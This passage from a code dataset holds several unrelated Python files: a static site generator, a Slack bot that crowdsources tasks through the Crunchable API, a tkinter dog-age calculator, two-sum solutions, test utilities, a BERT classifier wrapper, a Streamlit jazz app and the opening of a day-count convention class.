\"\"\"\n\n def __init__(self, steps):\n self.steps = steps\n\n def prepare(self, content, resource):\n return reduce(\n lambda content, step: step(content, resource),\n self.steps,\n content\n )\n\n\nclass Resource(object):\n\n \"\"\"An asset involved in the creation of a website.\n \"\"\"\n\n def __init__(self, **meta):\n self.__dict__.update(meta)\n\n def meta(self, **meta):\n if meta:\n self.__dict__.update(meta)\n else:\n return self.__dict__.copy()\n\n\nclass Site(object):\n\n \"\"\"A static website under construction.\n \"\"\"\n\n defaults = {\n\n 'base': '',\n 'draft_suffix': '.draft',\n\n 'filters': {\n '\\.md$': [\n 
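# extract YAML front matter from Markdown sources, falling back to these defaults\n                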
yaml_headers(defaults={\n 'suffix': '.html',\n 'template': 'default.html',\n }),\n ],\n },\n\n 'sitemap': 'sitemap.xml',\n 'source': '.',\n 'target': '.',\n 'templates': os.path.join(os.path.dirname(__file__), 'template'),\n\n 'transforms': {\n '\\.md$': [\n markdown(extensions=['codehilite(guess_lang=False)']),\n jinja2(),\n #minify(),\n ],\n },\n\n }\n\n def __init__(self, **config):\n self.__dict__.update(config)\n self.__resources = {}\n\n @classmethod\n def configure(this, path):\n\n \"\"\"Load website configuration from YAML file with reasonable defaults.\n \"\"\"\n\n def _config(path):\n\n config = yaml.load(Site.readTextFile(path))\n\n return config if isinstance(config, dict) else {}\n\n config = this.defaults.copy()\n\n if os.path.isdir(path):\n\n _path = os.path.join(path, 'site.yaml')\n\n if os.path.isfile(_path):\n config.update(_config(_path))\n\n elif os.path.isfile(path):\n\n config.update(_config(path))\n path = os.path.dirname(path)\n\n for key in ['source', 'target', 'templates']:\n config[key] = os.path.normpath(os.path.join(path, config[key]))\n\n return this(**config)\n\n def index(self, resource):\n\n \"\"\"List of resources related to the specified resource.\n \"\"\"\n\n if hasattr(resource, 'index'):\n # TODO filter criteria, sort order\n return OrderedDict(sorted(self.__resources.items()))\n\n @classmethod\n def readTextFile(this, name):\n\n \"\"\"Read content from UTF-8 text file, line-ending agnostic.\n \"\"\"\n\n with codecs.open(name, 'U', encoding='utf-8') as stream:\n return stream.read()\n\n @classmethod\n def recipe(this, name, recipes):\n\n \"\"\"Return the recipe with a pattern that matches the specified name.\n \"\"\"\n\n for pattern in recipes:\n if re.search(pattern, name):\n return Recipe(recipes[pattern])\n\n def render(self):\n\n self.scan()\n\n for name, resource in self.__resources.items():\n\n if hasattr(resource, 'content'):\n content = resource.content\n\n if content is None:\n continue\n\n recipe = self.recipe(name, self.transforms)\n\n if recipe:\n content = recipe.prepare(content, resource)\n\n if hasattr(resource, 'suffix'):\n name, suffix = os.path.splitext(name)\n name = name + resource.suffix\n\n if hasattr(self, 'base'):\n resource.url = self.base + name\n\n target = os.path.join(self.target, name)\n\n if hasattr(resource, 'draft') and resource.draft:\n target, suffix = os.path.splitext(target)\n target = target + self.draft_suffix + suffix\n\n self.writeTextFile(target, content)\n\n if self.sitemap:\n self.writeSitemap(os.path.join(self.target, self.sitemap))\n\n def resource(self, name):\n if name in self.__resources:\n return self.__resources[name]\n\n def scan(self, refresh=False):\n\n if refresh:\n self.__resources = []\n\n for path, _, filenames in os.walk(self.source):\n for filename in filenames:\n\n recipe = self.recipe(filename, self.filters)\n\n if recipe:\n self._scan(path, filename, recipe)\n\n for resource in self.__resources.values():\n resource.meta(xref=self.index(resource))\n\n def writeSitemap(self, name):\n\n xmlns = 'http://www.sitemaps.org/schemas/sitemap/0.9'\n ElementTree.register_namespace('', xmlns)\n urlset = ElementTree.Element('{' + xmlns + '}urlset')\n\n for resource in self.__resources.values():\n\n url = ElementTree.SubElement(urlset, 'url')\n loc = ElementTree.SubElement(url, 'loc')\n loc.text = resource.url\n lastmod = ElementTree.SubElement(url, 'lastmod')\n lastmod.text = resource.modified.isoformat()\n\n if hasattr(resource, 'changefreq'):\n changefreq = ElementTree.SubElement(url, 'changefreq')\n 
changefreq.text = resource.changefreq\n\n            if hasattr(resource, 'priority'):\n                priority = ElementTree.SubElement(url, 'priority')\n                priority.text = resource.priority\n\n        self.writeTextFile(name, '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' + ElementTree.tostring(urlset))\n\n    @classmethod\n    def writeTextFile(this, name, content):\n\n        \"\"\"Write content to UTF-8 text file, creating directories as needed.\n        \"\"\"\n\n        dirname = os.path.dirname(name)\n\n        if dirname and not os.path.isdir(dirname):\n            os.makedirs(dirname)\n\n        with codecs.open(name, 'w', encoding='utf-8') as stream:\n            stream.write(content)\n\n    def _scan(self, path, filename, recipe):\n\n        source = os.path.join(path, filename)\n        modified = os.path.getmtime(source)\n        modified = datetime.fromtimestamp(modified, tzlocal())\n        title, suffix = os.path.splitext(filename)\n        name = os.path.join(path, slugify(title) + suffix)\n        name = os.path.relpath(name, self.source)\n        resource = self.resource(name)\n\n        if not resource or resource.modified != modified:\n\n            resource = Resource(\n                modified=modified,\n                pubdate=datetime.combine(modified, time(0, 0)),\n                site=self,\n                source=source,\n                suffix=suffix,\n                title=title,\n            )\n\n            content = self.readTextFile(source)\n            resource.content = recipe.prepare(content, resource)\n            self.__resources[name] = resource\n\n\n# enable parsing of timestamps\nyaml.add_constructor(\n    u'tag:yaml.org,2002:timestamp',\n    lambda _, node: dateutil.parser.parse(node.value)\n)\n\nif __name__ == '__main__':\n    Site.configure(os.getcwd()).render()\n","sub_path":"gild/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"127413626","text":"\"\"\" Contains the Snippet class and methods for handling snippets.\n\nAttributes:\n    SNIPPET_PREFIX: string prefix for snippets.\n\"\"\"\n\nSNIPPET_PREFIX = \"SNIPPET_\"\n\n\ndef is_snippet(token):\n    \"\"\" Determines whether a token is a snippet or not.\n\n    Inputs:\n        token (str): The token to check.\n\n    Returns:\n        bool, indicating whether it's a snippet.\n    \"\"\"\n    return token.startswith(SNIPPET_PREFIX)\n\ndef expand_snippets(sequence, snippets):\n    \"\"\" Given a sequence and a list of snippets, expand the snippets in the sequence.\n\n    Inputs:\n        sequence (list of str): Query containing snippet references.\n        snippets (list of Snippet): List of available snippets.\n\n    return list of str representing the expanded sequence\n    \"\"\"\n    snippet_id_to_snippet = {}\n    for snippet in snippets:\n        assert snippet.name not in snippet_id_to_snippet\n        snippet_id_to_snippet[snippet.name] = snippet\n    expanded_seq = []\n    for token in sequence:\n        if token in snippet_id_to_snippet:\n            expanded_seq.extend(snippet_id_to_snippet[token].sequence)\n        else:\n            assert not is_snippet(token)\n            expanded_seq.append(token)\n\n    return expanded_seq\n\ndef snippet_index(token):\n    \"\"\" Returns the index of a snippet.\n\n    Inputs:\n        token (str): The snippet to check.\n\n    Returns:\n        integer, the index of the snippet.\n    \"\"\"\n    assert is_snippet(token)\n    return int(token.split(\"_\")[-1])\n\n\nclass Snippet():\n    \"\"\" Contains a snippet. \"\"\"\n    def __init__(self,\n                 sequence,\n                 startpos,\n                 sql,\n                 age=0):\n        self.sequence = sequence\n        self.startpos = startpos\n        self.sql = sql\n\n        # TODO: age vs. 
index?\n self.age = age\n self.index = 0\n\n self.name = \"\"\n self.embedding = None\n\n self.endpos = self.startpos + len(self.sequence)\n assert self.endpos < len(self.sql), \"End position of snippet is \" + str(\n self.endpos) + \" which is greater than length of SQL (\" + str(len(self.sql)) + \")\"\n assert self.sequence == self.sql[self.startpos:self.endpos], \\\n \"Value of snippet (\" + \" \".join(self.sequence) + \") \" \\\n \"is not the same as SQL at the same positions (\" \\\n + \" \".join(self.sql[self.startpos:self.endpos]) + \")\"\n\n def __str__(self):\n return self.name + \"\\t\" + \\\n str(self.age) + \"\\t\" + \" \".join(self.sequence)\n\n def __len__(self):\n return len(self.sequence)\n\n def increase_age(self):\n \"\"\" Ages a snippet by one. \"\"\"\n self.index += 1\n\n def assign_id(self, number):\n \"\"\" Assigns the name of the snippet to be the prefix + the number. \"\"\"\n self.name = SNIPPET_PREFIX + str(number)\n\n def set_embedding(self, embedding):\n \"\"\" Sets the embedding of the snippet.\n\n Inputs:\n embedding (dy.Expression)\n\n \"\"\"\n self.embedding = embedding\n","sub_path":"data_util/snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120510189","text":"##############################################################\r\n##File Name: Dog Age Calculator ##\r\n##File Type: Python 3 ##\r\n## ##\r\n##Author: Joseph Brown ##\r\n##Project Type: Independent Project ##\r\n##Creation Date: 28 May 2021 ##\r\n##Last Modification Date: ##\r\n## ##\r\n##Description: ##\r\n##A Calculator made for helping create a Dog's Age ##\r\n## ##\r\n##Version: 2.0 ##\r\n## ##\r\n##Version History: ##\r\n## 2.0 - Changed to a Basic Graphical Interface ##\r\n##1.2 - Made the Program More User Friendly ##\r\n##1.11 - Tidied Up Sleeps and Added More to the Results ##\r\n##1.1 - Added Use of Sleep to Make Program Last for Longer ##\r\n##1.0 - Basic Calculations of the Age using Input Variables ## \r\n##############################################################\r\n\r\n#Imports\r\nimport tkinter\r\nimport os\r\nfrom tkinter.constants import BOTTOM\r\n\r\n##Version 2 Code##\r\n\r\n#Application\r\nname_window = tkinter.Tk()\r\nname_window.title(\"Dog Calculator\")\r\nname_window.geometry(\"400x350\")\r\nname_window.columnconfigure(0, weight=1)\r\nname_window.columnconfigure(1, weight=1)\r\nname_window.columnconfigure(2, weight=1)\r\n\r\n#Variables\r\nname_var = tkinter.StringVar()\r\nage_var = tkinter.StringVar()\r\n\r\n#Functions\r\ndef donothing():\r\n filewin = tkinter.Toplevel()\r\n button = tkinter.Button(filewin, text=\"Do Nothing Button\")\r\n button.pack()\r\n\r\ndef program_info():\r\n sysinfo = tkinter.Toplevel()\r\n sysinfo.title(\"Dog Calculator - Program Info\")\r\n sysinfo.geometry(\"400x100\")\r\n info_name = tkinter.Label(sysinfo, text=\"Dog Calculator\")\r\n info_name.pack()\r\n info_ver = tkinter.Label(sysinfo, text=\"Version 2.0\")\r\n info_ver.pack()\r\n info_auth = tkinter.Label(sysinfo, text=\"By Joseph Brown\")\r\n info_auth.pack()\r\n info_exit = tkinter.Button(sysinfo, text=\"Close\", command=sysinfo.destroy)\r\n info_exit.pack()\r\n\r\ndef name_submit():\r\n dog_name = name_var.get()\r\n name_var.set(\"\")\r\n print(dog_name)\r\n\r\ndef age_submit():\r\n age = age_var.get()\r\n age_var.set(\"\")\r\n print(age)\r\n\r\n#Application Menu\r\nmenubar = tkinter.Menu()\r\nfilemenu = tkinter.Menu(menubar, 
tearoff=0)\r\nfilemenu.add_command(label=\"Restart\", command=donothing)\r\n\r\nfilemenu.add_separator()\r\n\r\nfilemenu.add_command(label=\"Exit\", command=quit)\r\nmenubar.add_cascade(label=\"File\", menu=filemenu)\r\n\r\nhelpmenu = tkinter.Menu(menubar, tearoff=0)\r\nhelpmenu.add_command(label=\"Options\", command=donothing)\r\nhelpmenu.add_command(label=\"Program Help\", command=donothing)\r\n\r\nhelpmenu.add_separator()\r\n\r\nhelpmenu.add_command(label=\"Program Info\", command=program_info)\r\nmenubar.add_cascade(label=\"Help\", menu=helpmenu)\r\n\r\n#Application Workings\r\ndog_name_entry = tkinter.Label(text=\"What is Your Dog's Name? \")\r\ndog_name_entry2 = tkinter.Entry(textvariable=name_var)\r\ndog_name_entry_button = tkinter.Button(text=\"Submit\", width=10, height=2, background=\"White\", command=name_submit)\r\n\r\nage_entry = tkinter.Label(text=\"What is Your Dog's Age in Human Years? \")\r\nage_entry2 = tkinter.Entry(textvariable=age_var)\r\nage_entry_button = tkinter.Button(text=\"Submit\", width=10, height=2, background=\"White\", command=age_submit)\r\n\r\nresult = tkinter.Label(text = \"Your Dog: \")\r\nresult_name = tkinter.Label(text=\"DogName\")\r\nresult2 = tkinter.Label(text = \"Is: \")\r\nresult2_name = tkinter.Label(text=\"Age\")\r\nresult3 = tkinter.Label(text=\"That's: \")\r\nresult3_age = tkinter.Label(text=\"DogAge\")\r\nresult3_final = tkinter.Label(text=\" In Dog Years!\")\r\n\r\ndog_name_entry.grid(column=1, row=0)\r\ndog_name_entry2.grid(column=1, row=1)\r\ndog_name_entry_button.grid(column=1, row=2)\r\n\r\nspace1 = tkinter.Label(text=\" \")\r\nspace1.grid(column=1, row=3)\r\nspace2 = tkinter.Label(text=\" \")\r\nspace2.grid(column=1, row=4)\r\n\r\nage_entry.grid(column=1, row=5)\r\nage_entry2.grid(column=1, row=6)\r\nage_entry_button.grid(column=1, row=7)\r\n\r\nspace = tkinter.Label(text=\" \")\r\nspace.grid(column=1, row=8)\r\nspace1 = tkinter.Label(text=\" \")\r\nspace1.grid(column=1, row=9)\r\n\r\nresult.grid(column=0, row=10)\r\nresult_name.grid(column=0, row=11)\r\nresult2.grid(column=1, row=10)\r\nresult2_name.grid(column=1, row=11)\r\nresult3.grid(column=2, row=10)\r\nresult3_age.grid(column=2, row=11)\r\nresult3_final.grid(column=2, row=12)\r\n\r\n#Packing Overall Application\r\nname_window.config(menu=menubar)\r\nname_window.mainloop()\r\n\r\n","sub_path":"Dog Calculator V2.py","file_name":"Dog Calculator V2.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"192725149","text":"#Two Sum\n#Approach 1: brute force [5804ms]\n#Approach 2: hash table [2968ms]\n#Approach 3: sort, then squeeze with two pointers\nclass Solution(object):\n    def twoSum(self, nums, target):\n        result = []\n        for i in range(len(nums)):\n            for j in range(i+1, len(nums)):\n                if nums[i] + nums[j] == target:\n                    result.append(i)\n                    result.append(j)\n        return result\n\nclass Solution(object):\n    def twoSum(self, nums, target):\n        result = []\n        hashtable = {}\n        for i in range(len(nums)):\n            hashtable[str(nums[i])] = i\n        \n        for j in range(len(nums)):\n            tmp = str(target - nums[j])\n            if tmp in hashtable.keys() and hashtable[tmp] != j:\n                result.append(j)\n                result.append(hashtable[tmp])\n        return sorted(result)","sub_path":"src/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"287579080","text":"import datetime\nimport os\nimport shutil\nimport time\n\nfrom base.driver_context import DriverContext\n\n\nclass Utilities:\n    path = 
os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n    SCREENSHOTS_LOC = path + '/screen_shots'\n\n    @staticmethod\n    def convert_blank_data_value(data):\n        if data.lower() == 'blank':\n            data = ''\n        elif '<space>' in data:  # '<space>' placeholder assumed; the original literal token was stripped during extraction\n            data = data.replace('<space>', ' ')\n        return data\n\n    @staticmethod\n    def get_values_as_a_list(values):\n        return values.split(',')\n\n    @staticmethod\n    def get_question_code_element(survey, question_code):\n        if survey == '023':\n            question_code = question_code.replace(\"Q\", \"\")\n        else:\n            question_code = question_code.replace(\"Q\", \"\").zfill(4)\n        return question_code\n\n    @staticmethod\n    def remove_multiple_spaces_in_a_string(value):\n        return \" \".join(value.split())\n\n    @staticmethod\n    def take_screen_shot(*scenario_details):\n        scenario = scenario_details[0]\n\n        if scenario.status.name == 'failed':\n            Utilities.create_screen_shots_folder()\n            scenario_with_line_no = scenario.feature.scenarios[0].name + '_line_no_' + str(scenario.line)\n\n            scenario_file_path = os.path.join(Utilities.SCREENSHOTS_LOC,\n                                              scenario_with_line_no\n                                              + '_' + time.strftime(\"%H%M%S_%d_%m_%Y\")\n                                              + '.png')\n            print(\"take the screenshot! \" + scenario_file_path)\n            DriverContext.driver.save_screenshot(scenario_file_path)\n\n    @staticmethod\n    def delete_screenshots_folder():\n        if os.path.isdir(Utilities.SCREENSHOTS_LOC):\n            shutil.rmtree(Utilities.SCREENSHOTS_LOC)\n            print(\"removed the screenshots folder!\")\n\n    @staticmethod\n    def create_screen_shots_folder():\n        if not os.path.exists(Utilities.SCREENSHOTS_LOC):\n            print('create new folder')\n            os.makedirs(Utilities.SCREENSHOTS_LOC)\n\n    @staticmethod\n    def date_converter(year, month, day):\n        return datetime.date(year, month, day)\n","sub_path":"tests/acceptance-tests/base/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"505635935","text":"import tensorflow as tf\nfrom transformers import TFBertForSequenceClassification, TFBertModel\n\n\nclass CZERT(tf.keras.Model):\n\n    def __init__(self, model_dir, num_labels):\n        super(CZERT, self).__init__()\n        self.encoder = TFBertModel.from_pretrained(model_dir)\n        self.cls_layer = tf.keras.layers.Dense(num_labels)\n\n    def __call__(self, example, *args, **kwargs):\n        output = self.encoder(example['input_ids'])\n        # cls_tokens = output['last_hidden_state'][:, 0, :]\n        cls_tokens = output['pooler_output']\n        x = self.cls_layer(cls_tokens)\n        return x\n","sub_path":"czert.py","file_name":"czert.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"417190153","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n# don't convert to ascii in py2.7 when creating string to return\n\nimport os\nimport json\nimport gevent\nfrom crunchable import Crunchable\nfrom braceexpand import expand_braces\nimport logging\nfrom threading import Lock\nfrom contextlib import contextmanager\nimport datetime\nlock = Lock()\n\n\noutputs = []\ncrontabs = []\nuser_name = None\nuser_id = None\n\nFILE = \"plugins/tasks.json\"\n\ndef get_state_file():\n    global config\n    return config.get('CRUNCHABLE_STATE', 'plugins/state.json')\n\n@contextmanager\ndef get_state():\n    filename = get_state_file()\n    with lock:\n        try:\n            state = json.loads(open(filename, 'rb').read())\n        except IOError:\n            state = {}\n        if 'pending' not in state:\n            state['pending'] = {}\n        yield state\n    open(filename, 
'wb').write(json.dumps(state))\n\ndef store_pending(id, channel, user, identifier):\n with get_state() as state:\n state['pending'][id] = [channel, user, identifier]\n\ndef pop_pending(id):\n with get_state() as state:\n try:\n state['pending'].pop(id)\n except KeyError:\n logging.warn('tried to pop missing id: {}'.format(id))\n\ndef read_state():\n with get_state() as state:\n return state\n\ndef respond(channel, text):\n global outputs\n outputs.append([channel, text])\n\ndef send_file(channel, content, filetype, filename):\n global outputs\n outputs.append([channel, 'FILE', content, filetype, filename])\n\ndef respond_to_user(channel, user, text):\n if channel.startswith('D'): #private chat\n respond(channel, text)\n else:\n respond(channel, '<@{}>: '.format(user) + text)\n\ndef dm_to_user(channel, user, text):\n if channel.startswith('D'): #private chat\n respond(channel, text)\n else:\n outputs.append([channel, 'DM', user, text])\n\ndef head(text):\n try:\n first, rest = text.split(None, 1)\n return first, rest\n except ValueError:\n return text, None\n\ndef get_tasks():\n return json.loads(open(FILE, 'rb').read())\ndef save_tasks(tasks):\n with open(FILE, 'wb') as f:\n f.write(json.dumps(tasks, indent=2))\nif not os.path.isfile(FILE):\n save_tasks({})\ndef add_new_task(identifier, task):\n tasks = get_tasks()\n tasks[identifier] = task\n save_tasks(tasks)\n\ndef get_crunchable_client():\n global config\n token = config['CRUNCHABLE_TOKEN']\n client = Crunchable(token)\n return client\n\ndef send_task(task, attachments):\n client = get_crunchable_client()\n request = client.request_free_text(attachments=attachments, **task)\n response = client.wait_for_task(request['id'])\n return response['response']\n\ndef wait_for_task(channel, user, client, task_id, identifier):\n response = client.wait_for_task(task_id)\n if response['status'] == 'complete':\n answer = response.get('response', '')\n else:\n answer = response.get('cruncher_feedback')\n respond_to_user(channel, user, \"Here's your response (you asked: {} {})\".format(identifier, response['attachments'][0]))\n respond(channel, \"{}\".format(answer))\n pop_pending(task_id)\n return (identifier, response['attachments'][0], answer)\n\ndef send_tasks(channel, user, identifier, task, attachments):\n client = get_crunchable_client()\n requests = [client.request_free_text(attachments=[att], **task) for att in attachments]\n [store_pending(req['id'], channel, user, identifier) for req in requests]\n asyncs = [gevent.spawn(wait_for_task, channel, user, client, req['id'], identifier) for req in requests]\n if len(asyncs) > 1:\n responses = gevent.joinall(asyncs)\n lines = [','.join(response.value) for response in responses]\n content = '\\n'.join(lines)\n respond_to_user(channel, user, 'And to summarize:')\n send_file(channel, content, 'csv', 'crunchable-responses-{}.csv'.format(datetime.datetime.now().isoformat()))\n\ndef recover_state():\n state = read_state()\n pending = state.get('pending', {})\n client = get_crunchable_client()\n for (id, [channel, user, identifier]) in pending.iteritems():\n gevent.spawn(wait_for_task, channel, user, client, id, identifier)\n\ndef setup():\n recover_state()\n\nSOMETHING_ELSE = 'Nothing fits'\nNOT_A_REQUEST = 'Irrelevant/Nonsense'\n\nRECOGNIZE_TASK = dict(\n instruction=\"We are building a knowledge-base on how to execute various internet searches.\\nHelp us match between the **request** quoted below and a list of relevant search instructions listed in the choices.\\n\\nChoose the one that you think fits 
the request.\\nChoose **'{}'** if none of them match.\\nChoose **'{}'** if the attached request does not look like a question at all (or if it's just some non-sense)\\n\\n**There is no need to perform any task! only choose the most relevant one!**\".format(SOMETHING_ELSE, NOT_A_REQUEST),\n min_answers = 1,\n max_answers = 1,\n choices_type='text',\n# tags = ['role.crunch_qa'],\n)\n\ndef crunchable_recognize_task(text):\n client = get_crunchable_client()\n tasks = get_tasks()\n attachments = ['**Request:** {}'.format(text)] # + ['{}: {}'.format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())]\n # choices = sorted(tasks.keys()) + [SOMETHING_ELSE, NOT_A_REQUEST]\n choices = ['{}: {}'.format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())] + [SOMETHING_ELSE, NOT_A_REQUEST]\n request = client.request_multiple_choice(choices=choices, attachments=attachments, **RECOGNIZE_TASK)\n response = client.wait_for_task(request['id'])\n [choice] = response['response']\n return choice\n\nAUTOLEARN_TASK = dict(\n instruction=\"Look at the **request** below, and help us write a good instruction on how to perform similar tasks.\\nAlso, please give a name to these types of instructions. \\n See below a list of examples of similar tasks. \\n \\n **If you are unable to write a good instruction, just leave the response fields blank**\",\n responseTitles=[\"identifier\",\"instruction\"],\n tags=['role.crunch_qa'],\n)\n\ndef crunchable_autolearn_task(channel, user, text):\n client = get_crunchable_client()\n tasks = get_tasks()\n attachments = ['**Request:** ' + text] + [\"**Example:**\\nIdentifier: {}\\nInstruction: {}\".format(identifier, task['instruction']) for (identifier, task) in sorted(tasks.iteritems())]\n request = client.request_free_text(attachments=attachments, **AUTOLEARN_TASK)\n response = client.wait_for_task(request['id'])['response']\n identifier = response['identifier'].strip()\n instruction = response['instruction'].strip()\n if (not identifier) or (not instruction):\n return\n task = {'instruction': instruction}\n add_new_task(identifier, task)\n dm_to_user(channel, user, \"I learned something new today!\")\n dm_to_user(channel, user, \"@crunchable-bot {} --- {}\".format(identifier, instruction))\n trigger_known_instruction(channel, user, task, text, identifier)\n\ndef learn_new_instruction(channel, text, override=False):\n identifier, instruction = head(text)\n if not override:\n tasks = get_tasks()\n if identifier in tasks:\n respond(channel, \"I already know how to do this! if you want to override - try '@crunchable-bot: reteach ...'\")\n return\n \n task = {'instruction': instruction}\n add_new_task(identifier, task)\n respond(channel, 'Thanks! 
now I know how to do that!')\n\ndef handle_unrecognized_commmand(channel, user, text):\n respond(channel, \"TYPING\")\n respond_to_user(channel, user, \"I'm on it!\")\n task_identifier = crunchable_recognize_task(text)\n if task_identifier == NOT_A_REQUEST:\n return respond_to_user(channel, user, \"Sorry, I didn't understand you\")\n if task_identifier == SOMETHING_ELSE:\n gevent.spawn(crunchable_autolearn_task, channel, user, text)\n respond_to_user(channel, user, \"OK, let me see if I can figure it out (you can also help me by teaching me how to do it)\")\n show_teach_instruction(channel)\n return\n tasks = get_tasks()\n identifier = task_identifier.split(':')[0]\n task = tasks[identifier]\n trigger_known_instruction(channel, user, task, text, identifier)\n\ndef trigger_known_instruction(channel, user, task, text, identifier):\n respond_to_user(channel, user, \"Please wait while I look for someone to answer you...\")\n send_tasks(channel, user, identifier, task, attachments=expand_braces(text))\n\ndef trigger_internal_fetch(channel, user, text, slack_client):\n users_to_fetch = text.split()\n respond_to_user(channel, user, \"Sure, I'll fetch him for you! hang tight!\")\n client = get_crunchable_client()\n\n username = slack_client.api_call('users.info', user=user)['user']['name']\n for user in users_to_fetch:\n client.request_multiple_choice(instruction=\"Please contact {} on Slack. Thanks!\".format(username), choices=[\"Sure!\", \"OK!\"], min_answers=1, max_answers=1, choices_type=\"text\", tags=[user], priority=10)\n\ndef show_help_messsage(channel, tasks):\n respond(channel, \"Here's what I already know how to do:\")\n for identifier, task in tasks.iteritems():\n respond(channel, \"{} - {}\".format(identifier, task['instruction']))\n respond(channel, \"But you can easily teach me new stuff! 
simply use:\")\n show_teach_instruction(channel)\n\ndef show_teach_instruction(channel):\n respond(channel, \"@crunchable-bot: teach ''\")\n respond(channel, \"For example: @crunchable-bot: teach gettimezone 'Search google for the timezone of the given city'\") \n\ndef process_message(data):\n channel = data[\"channel\"]\n logging.info('crunchable sees {}'.format(data))\n if 'text' not in data:\n logging.warn('got data with no text {}'.format(data))\n return\n text = data[\"text\"]\n if 'user' not in data:\n logging.warn('got data with no user {}'.format(data))\n return\n user = data['user']\n if user == user_id:\n # ignore what I say...\n return\n possible_names = {'crunchable', '<@{}>:'.format(user_id), '<@{}>'.format(user_id), user_name}\n if channel.startswith('D'):\n # private chat\n try:\n myname, moretext = head(text)\n if myname not in possible_names:\n moretext = text \n except ValueError:\n moretext = text\n else:\n try:\n myname, moretext = head(text)\n if myname not in possible_names:\n return\n except ValueError:\n return\n try:\n if moretext.lower().replace('!','').strip() in ['hi', 'hello']:\n return respond(channel, \"Hello there!\")\n if moretext.lower().replace('!', '').replace('?','') == \"are you ready\":\n return respond(channel, \"I was born ready!\")\n if moretext.lower().replace('!', '').replace('?','') == \"ping\":\n return dm_to_user(channel, user, \"Pong!\")\n identifier, rest = head(moretext)\n lidentifier = identifier.lower()\n if lidentifier == 'teach':\n return learn_new_instruction(channel, rest)\n if lidentifier == 'reteach':\n return learn_new_instruction(channel, rest, override=True)\n tasks = get_tasks()\n if lidentifier == 'help':\n return show_help_messsage(channel, tasks)\n if any(lidentifier.startswith(x) for x in ['thank', '10x']):\n respond(channel, \"You're welcome, <@{}>!\".format(user))\n return\n if lidentifier == 'fetch':\n if config.get('internal', False):\n return gevent.spawn(trigger_internal_fetch, channel, user, rest, data['__slack_client'])\n else:\n return respond_to_user(channel, user, \"I'm not sure what you want me to do...\")\n lowercase_to_originalcase = {task_id.lower(): task_id for task_id in tasks}\n if lidentifier in lowercase_to_originalcase:\n identifier = lowercase_to_originalcase[lidentifier]\n if identifier in tasks:\n logging.info(\"{} recognized as task\".format(identifier))\n return gevent.spawn(trigger_known_instruction, channel, user, tasks[identifier], rest, identifier)\n # unknown command, use crunchable to understand what the user wants\n logging.info(\"unrecognized identifier {}\".format(moretext))\n gevent.spawn(handle_unrecognized_commmand, channel, user, moretext)\n except ValueError:\n return respond(channel, \"Sorry, I'm not feeling so well... 
can you send someone to check in on me, please?\")\n\n\ndef process_user_info(data):\n    global user_name\n    global user_id\n    if 'user' in data:\n        user_name = data['user']\n    if 'user_id' in data:\n        user_id = data['user_id']\n\ndef catch_all(data):\n    return # disabled for now\n    global config\n    print(config)\n    print(\"[ALL]\", data)\n","sub_path":"plugins/crunchablebot.py","file_name":"crunchablebot.py","file_ext":"py","file_size_in_byte":12903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"609686684","text":"import numpy as np\nimport streamlit as st\nimport base64\nfrom GimmeSomeJazz import GimmeSomeJazz\nfrom GimmeSomeJazzGifs import GimmeSomeJazzGifs\n\n\nDATASET = 'dataset/library.json'\n\n\nst.set_page_config(\n    layout=\"wide\",\n    initial_sidebar_state=\"auto\",\n    page_title=\"🎙️Gimme Some Jazz!\",\n    page_icon=\"🎙️\"\n)\nleft_column, right_column = st.beta_columns(2)\nleft_column.write(\"# I'm your jazz coach\")\nleft_column.write(\"Feeding you with the best of jazz\")\nbutton = left_column.button(\"Gimme some jazz!\", \"new\")\n\ngifer = GimmeSomeJazzGifs(\"LIVDSRZULELA\")\ntrainer = GimmeSomeJazz(DATASET)\n\nif button:\n    desc = trainer.draw()\n    gif = gifer.draw()\n    left_column.write(desc, unsafe_allow_html=True)\n    right_column.image(gif, width=400, use_column_width='always')\n    right_column.write(\"[link to TenorGif](%s)\" % gif)\n","sub_path":"gsj-app.py","file_name":"gsj-app.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"548196446","text":"from operator import add, sub\r\n\r\nfrom schedule.calendar import Calnedar\r\nfrom schedule.days import Days\r\nfrom schedule.weeks import Weeks\r\nfrom schedule.months import Months\r\nfrom schedule.years import Years\r\n\r\n\r\nclass DayConvention:\r\n    __period_dictionary = {\"D\": Days, \"W\": Weeks, \"M\": Months, \"Y\": Years}\r\n\r\n    def __init__(self, value_date, calendar):\r\n        self.__calendar = calendar\r\n        self.__value_date = value_date\r\n\r\n    def convert_tenor_to_date(self, tenor, start_date = None):\r\n        if start_date is None:\r\n            start_date = self.__value_date\r\n\r\n        expiry_date = start_date\r\n        if tenor in [\"ON\", \"TN\"]:\r\n            n_day = 1 if tenor == \"ON\" else 2\r\n            while (n_day > 0):\r\n                expiry_date = expiry_date + Days(1)\r\n                if self.is_businessday(expiry_date):\r\n                    n_day -= 1\r\n        else:\r\n            base = tenor[-1]  # unit letter, e.g. \"M\" in \"3M\"\r\n            num = int(tenor[:-1])  # count, e.g. 3 in \"3M\"\r\n            period = self.__period_dictionary[base](num)\r\n            expiry_date = expiry_date + period\r\n            \r\n            if self.is_holiday(expiry_date):\r\n                emo = self.__calendar.last_business_day_of_month(expiry_date.year, expiry_date.month)\r\n                op = sub if (base in 